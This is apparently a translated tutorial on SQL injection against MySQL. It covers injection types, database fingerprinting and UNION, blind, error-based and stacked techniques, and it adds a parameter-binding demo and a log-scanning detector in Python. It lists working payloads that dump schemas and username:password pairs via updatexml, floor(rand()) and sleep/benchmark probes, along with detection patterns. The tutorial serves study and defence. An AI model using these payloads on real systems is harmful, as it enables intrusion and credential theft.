
1 Database basics

1.1 Definition

A database is a warehouse for storing data.

A collection of data stored together in an organised way, shareable by multiple users, with as little redundancy as possible, and independent of the applications that use it.

1.2 Classification

Relational databases (SQL): data is organised as tables, with complex relationships between the tables.

MySQL, SQLServer, etc.

Non-relational databases (NoSQL): key-value form, which simplifies the database structure and avoids redundancy.

MongoDB, Redis, memcached

1.3 Basic operations

View the databases

show databases;

Select a database

use information_schema;

View the database currently in use

select database();

View the tables

show tables;

View the database version

select version();

View the user of the current connection

select user();

View the data directory

select @@datadir;

View the installation directory

select @@basedir;

View the operating system type

select @@version_compile_os;

1.4 Metadata tables: information_schema

information_schema is an information database that holds metadata about all other databases maintained by the MySQL server, such as database names, tables, column data types and access permissions. It is very useful during web penetration testing.

SCHEMATA table: provides information about all databases in the current MySQL instance. Its content matches the result of show databases.

TABLES table: provides information about the tables in each database (including views).

COLUMNS table: provides column information, describing every column of every table in detail.

Query table names through the metadata tables

select table_name from information_schema.tables where table_schema='test';

Query column names through the metadata tables

select column_name from information_schema.columns where table_name='table1';

2 SQL injection: definition and types

2.1 Definition

A security vulnerability that arises at the boundary between the application layer and the database layer.

SQL statements fixed inside the website are generally not dangerous, but in practice SQL statements have to be built dynamically from user input. If that input is crafted into malicious SQL code and the web application does not check the parameters it uses to build the statement, a security risk results.

How it arises: the user controls the parameters that are passed in

The content of the user's parameters is spliced into the SQL statement

The spliced SQL statement is executed by the database

Summary: the data entered by the user is executed as code

2.2 Classification

Boolean injection

UNION (joint query) injection

Time-based injection

Error-based injection

Stacked injection (multi-statement query injection)

3 Identifying SQL injection

Questions

Does the target URL have a SQL injection?

If SQL injection exists, which kind is it?

What type of backend database sits behind the injection?

3.1 The classic single-quote test

http://xxx/text.php?id=1'

If the page returns an error, SQL injection exists; both character-type and integer-type parameters will error because the single quotes no longer match up.
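The splicing-versus-binding difference described in 2.1, and the single-quote test of 3.1, as an added example that is not part of the original post. It uses Python's sqlite3 module with a constructed in-memory users table standing in for the MySQL backend; the table, its rows and the function names are assumptions made for the example. The vulnerable function parses the user's value as SQL; the hardened one binds it as a parameter, so the same inputs neither break the statement nor change its logic.

```python
import sqlite3


# Constructed sample data: an in-memory SQLite database standing in for the
# MySQL backend described in the notes; table name and rows are invented.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "s3cret"), (2, "alice", "hunter2"), (3, "bob", "letmein")],
    )
    return conn


def find_user_vulnerable(conn, username):
    """Section 2.1 failure mode: the user's value is spliced into the SQL text,
    so whatever it contains is parsed and executed as code."""
    sql = "SELECT id, username FROM users WHERE username='" + username + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, username):
    """Hardened form: a bound parameter. The driver hands the value to the
    engine separately from the statement, so it is never parsed as SQL."""
    sql = "SELECT id, username FROM users WHERE username=?"
    return conn.execute(sql, (username,)).fetchall()


def single_quote_probe(conn, lookup):
    """Section 3.1: append one quote. 'error' means the quotes became
    unbalanced inside the statement, i.e. the input reached the parser."""
    try:
        lookup(conn, "admin'")
        return "ok"
    except sqlite3.OperationalError:
        return "error"


if __name__ == "__main__":
    db = make_db()
    tautology = "x' OR '1'='1"
    print("vulnerable:", find_user_vulnerable(db, tautology))  # every row
    print("safe:      ", find_user_safe(db, tautology))        # no row
    print("probe vulnerable:", single_quote_probe(db, find_user_vulnerable))
    print("probe safe:      ", single_quote_probe(db, find_user_safe))
```

The probe result is exactly the signal the single-quote test looks for: the spliced query errors on the unbalanced quote, the bound query simply finds no user named `admin'`.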

3.2 Determining the injection type

Numeric type: usually append and 1=1 and and 1=2 to judge

Operator test: the key to this method is to determine, through addition, subtraction, multiplication, division and other operations, whether the input parameter is wrapped in quotes, and then obtain sensitive database information through general attack methods.

Character type: usually append and '1'='1 and and '1'='2 to judge

Type-conversion test: in MySQL, if the types on the two sides of an equals sign differ, a cast occurs. When a number is compared with string data, the string is converted to a number first and then compared. The string '1' equals the number 1; the string '1a' is cast to 1, so it equals 1; the string 'a' is cast to 0, so it equals 0.

Using this behaviour it is easy to judge whether the input point is character-type, that is, whether it is wrapped in quotes (single or double; single in most cases). Request ?id=3-2: the page comes back empty, so the parameter is not numeric but may be character-type. Then request ?id=2a: the result is returned successfully, which confirms it is character-type.

3.3 Identifying the database type

3.3.1 From error messages

MySQL

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line x

Access

Microsoft JET Database…

MSSQL

Microsoft ODBC Database…

3.3.2 Database-specific version information

SQL Server: select @@version--

Oracle: select banner from v$version

MySQL: select @@version, version()--, length(user())>0 returns normally

PostgreSQL: select version()--

3.3.3 Database-specific system tables

MySQL: information_schema

Access: mysysobjects

Oracle: sys.user_tables

MSSQL: sysobjects

3.3.4 Database-specific functions

SQL Server: @@pack_received @@rowcount

MySQL: connection_id(), last_insert_id(), row_count()

Oracle: bitand(1,1)

PostgreSQL: select extract(dow from now())

substring() can be called in MSSQL; Oracle only has substr()

3.3.5 String handling

MSSQL: id=1 and 'a'+'b'='ab'

MySQL: id=1 and 'a'+'b'='ab' , 'ab'=concat('a','b')

Oracle: id=1 and 'a'+'b'='a'||'b', 'ab'=concat('a','b')

PostgreSQL: id=1 and 'a'+'b'='a'||'b' , 'ab'=concat('a','b')

3.3.6 Special characters and comments

NULL and %00 are comment terminators supported by Access

# is a comment in MySQL; if it returns an error, the injection point may not be MySQL. MySQL also supports -- (with a trailing space) and /* */ comments

-- and /* */ are comments supported by Oracle, SQL Server and MySQL. If the page is normal, the backend is probably one of these three databases.

; is the statement separator. Oracle does not support multi-statement queries; if it returns an error, the backend is likely Oracle.

4 UNION query injection

4.1 Principle

The UNION operator merges the result sets of two or more SELECT statements.

Note

Every SELECT inside a UNION must have the same number of columns.

UNION injection, which returns the query result directly on the page, is the most straightforward form of injection.

4.2 Common statements


// Database names

union select 1,group_concat(schema_name),3 from information_schema.schemata

union select 1,(select schema_name from information_schema.schemata limit 0,1),3

//Table name

union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'

//Column name

union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='emails'

//data

union select 1,group_concat(id,email_id),3 from security.emails

5 Time-based and Boolean blind injection

Blind injection is a type of injection in which the content of the data is guessed without seeing the database's return value. Blind injection is generally divided into Boolean-based, time-based and error-based blind injection.

Time-based: inject a specific statement and judge whether the injection succeeded from a physical side effect of the request. For example, use the sleep() function in the SQL statement and judge the injection point by how long the page takes to load.

Boolean-based: the page returns only two kinds of state, True and False. Use the different responses to guess the data one piece at a time.

Applicable scenario: the execution result cannot be obtained from the displayed page, so there is no direct way to know whether the injected statement was executed.

5.1 Illustration of the principle

select * from user where id='?'

? is the user input; substitute: 4' and sleep(3)#

The SQL actually executed: select * from user where id='4' and sleep(3)#

When id=4 exists, the query sleeps for 3 seconds

When id=4 does not exist, it returns immediately

If the whole spliced SQL is correct, the sleep is executed. If the preceding condition fails (the id does not exist), sleep(3) is not executed.

5.2 Common functions

5.2.1 Encoding conversion functions

ord('a'): converts a character to its ASCII code

ascii('a'): converts a character to its ASCII code

char(97): converts an ASCII code to a character

5.2.2 Conditional functions

if(exp1, exp2, exp3): if exp1 holds, evaluate exp2, otherwise evaluate exp3.

case when ... then ...: select case when username='admin' then sleep(1) else 'error' end from wp_user_

5.2.3 Substring functions

substr(str, pos, len): starting at position pos, take len characters of the string str

substr(str from pos for len): alternative syntax without commas, usable when the normal form is filtered

substring(str, pos, len): starting at position pos, take len characters of the string str

substring(str from pos for len): alternative syntax without commas, usable when the normal form is filtered

Note: pos starts at 1

id=1 and if(ord(substr(database(),1,1))=116,1,0)%23

select substring(database() from 1 for 1)

select substring(database(), 0, 1)   // returns '' because pos starts at 1

mid(str, pos, len)

mid(str from pos for len)

select mid(database() from 1 for 1)

select mid(database(), 1, 1)

left(str, len): takes len characters from the left of the string

select left(database(), 1)

right(str, len): takes len characters from the right of the string

Match character by character with regular expressions

select * from wp_user_ where password rlike '^1'

select * from wp_user_ where password REGEXP '^1'

select * from wp_user_ where password REGEXP '^12'

5.2.4 Delay functions

sleep(n): suspends execution for n seconds

if(ascii(substr(database() from 1))=97, sleep(3),0)

benchmark(count, expr): executes expr (here sha(1)) count times to create a delay

SELECT BENCHMARK(10000000, sha(1))

Use a Cartesian product to create a delay:

SELECT count(*) from information_schema.columns A, information_schema.columns B, information_schema.tables C;

Use regular-expression matching against a long string to create a delay:

select * from wp_user_ where id=1 and IF(1,concat(rpad(1,999999,'a'),rpad(1,99999,'a'),rpad(1,99999,'a'),rpad(1,99999,'a'),rpad(1,99999,'a'),rpad(1,99999,'a'),rpad(1,99999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,99999,'a'),rpad(1,99999,'a'),rpad(1,99999,'a'),rpad(1,99999,'a'),rpad(1,99999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b',0)

5.2.5 Other functions

count(): counts the number of rows

length(): returns the length of a string

6 Error-based injection

6.1 Principle

Uses errors raised by SQL statements; applies when the query result is not echoed but the error message is shown in the output

The returned error message carries the information the attacker wants

MySQL error-based injection falls mainly into the following categories:

Overflow of data types such as BIGINT

XPath syntax errors

count() + rand() + group by causing a duplicate key

Errors from spatial (geometry) data type functions

6.2 Common functions

6.2.1 updatexml

The second parameter of updatexml must be a string in XPath format. If the input is not valid XPath, an error is raised that echoes the parameter value.

The maximum length of the error message is 32 characters


//Show the current database

updatexml(1,CONCAT(0x7e, database()),1)

//Show all databases

updatexml(1,CONCAT(0x7e,(select schema_name FROM INFORMATION_SCHEMA.SCHEMATA limit x,1),0x7e),1)

//Get the table name

updatexml(1,CONCAT(0x7e,(select table_name from information_schema.tables where table_schema='sectest' limit x,1),0x7e),1)

updatexml(1,make_set(3,'~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)

//Get the column name

updatexml(1,CONCAT(0x7e,(select column_name from information_schema.COLUMNS where table_name='wp_user_' limit 1,1),0x7e),1)

updatexml(1,make_set(3,'~',(select group_concat(column_name) from information_schema.columns where table_name='users')),1)

//Get data

updatexml(1,CONCAT(0x7e,(select username from wp_user_ limit 0,1),0x7e),1)

updatexml(1,CONCAT(0x7e,(select password from wp_user_ where username='admin' limit 0,1),0x7e),1)

updatexml(1,CONCAT(0x7e,(select GROUP_CONCAT(username,0x3a, password) from wp_user_ where id=1),0x7e),1)

updatexml(1,make_set(3,'~',(select data from users)),1)#

6.2.2 floor() error injection

and (select 1 from (select count(*), concat(user(), floor(rand(0)*2))x from information_schema.tables group by x)a)

and (select 1 from (select count(*), concat((select group_concat(username,0x3a,password) from wp_user_ where id=1), floor(rand(0)*2))x from information_schema.tables group by x)a)

6.2.3 Other error-based injections

and extractvalue(1,concat(0x7e,(select database())))

//1105 - XPATH syntax error: '~sectest', Time: 0.000000s

and exp(~(select * from (select user())a)) // MySQL 5

union select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))a;

//1060 - Duplicate column name '5.7.23', Time: 0.000000s

6.3 Demo

http://ctf5.shiyanbar.com/web/baocuo/index.php

Payload

updatexml(1,concat(0x7e,(version())),0)

http://ctf5.shiyanbar.com/web/baocuo/index.php

$sql=' select * from users where username='' and updatexml /*' and password='*/(1,concat(0x7e,(version())),0) or '1' '

7 Stacked injection

Several SQL statements are executed together

In MySQL, mainly on the command line, a ; at the end of each statement marks its end, which makes it possible to run multiple SQL statements together

Question

What is the difference between stacked injection and UNION injection?

The statement types UNION can execute are limited: it can only run query statements.

Stacked injection can execute any statement
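As an added example that is not part of the original post: detection logic, from the defender's side, that maps each injection family covered in sections 2.2 to 7 (Boolean, UNION, time-based, error-based and stacked, plus probing of information_schema) to a request-level pattern and runs it over web-server access log lines. The log lines, the /text.php path and the label names are constructed for the example; the patterns are built only from the functions and keywords the notes themselves list.

```python
import re
from urllib.parse import unquote_plus

# One pattern per injection family from the notes. Matching is done on the
# URL-decoded query string, so %27, %20 and %23 are seen as ', space and #.
PATTERNS = {
    "boolean": re.compile(r"\b(?:and|or)\s+'?\d+'?\s*=\s*'?\d+'?", re.I),
    "union": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "time": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
    "error": re.compile(
        r"\b(?:updatexml|extractvalue|name_const)\s*\(" r"|floor\s*\(\s*rand\s*\(",
        re.I,
    ),
    "stacked": re.compile(r";\s*(?:select|insert|update|delete|drop|create)\b", re.I),
    "metadata": re.compile(r"\binformation_schema\b", re.I),
}

# Pulls the request target out of a combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)')


def classify(query_string):
    """Returns the sorted list of injection families whose pattern matches."""
    decoded = unquote_plus(query_string)
    return sorted(name for name, rx in PATTERNS.items() if rx.search(decoded))


def request_target(log_line):
    m = REQUEST_RE.search(log_line)
    return m.group(1) if m else None


def suspicious_requests(log_lines):
    """Returns (target, labels) for every request whose query string matched."""
    hits = []
    for line in log_lines:
        target = request_target(line)
        if not target or "?" not in target:
            continue
        labels = classify(target.split("?", 1)[1])
        if labels:
            hits.append((target, labels))
    return hits


# Constructed access log lines (invented client, timestamps and sizes); the
# query strings mirror the statement shapes discussed in the notes.
LOG_LINES = [
    '10.0.0.5 - - [08/Jan/2021:15:59:25 +0800] "GET /text.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [08/Jan/2021:15:59:31 +0800] "GET /text.php?id=1%20and%201=2 HTTP/1.1" 200 88',
    '10.0.0.5 - - [08/Jan/2021:15:59:40 +0800] "GET /text.php?id=-1%20union%20select%201,'
    'group_concat(schema_name),3%20from%20information_schema.schemata HTTP/1.1" 200 730',
    '10.0.0.5 - - [08/Jan/2021:16:00:02 +0800] "GET /text.php?id=4%27%20and%20sleep(3)%23 HTTP/1.1" 200 512',
    '10.0.0.5 - - [08/Jan/2021:16:00:15 +0800] "GET /text.php?id=1%20and%20updatexml(1,concat(0x7e,database()),1) HTTP/1.1" 500 210',
    '10.0.0.5 - - [08/Jan/2021:16:00:20 +0800] "GET /text.php?id=1;select%201 HTTP/1.1" 500 210',
]

if __name__ == "__main__":
    for target, labels in suspicious_requests(LOG_LINES):
        print(", ".join(labels).ljust(18), target)
```

Decoding before matching matters: the time-based probe in the notes ends in %23, and without decoding a rule written for `#` or `'` never fires. A real deployment would also look at response time and status code for the time-based and error-based families, since those are the side channels the notes describe.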
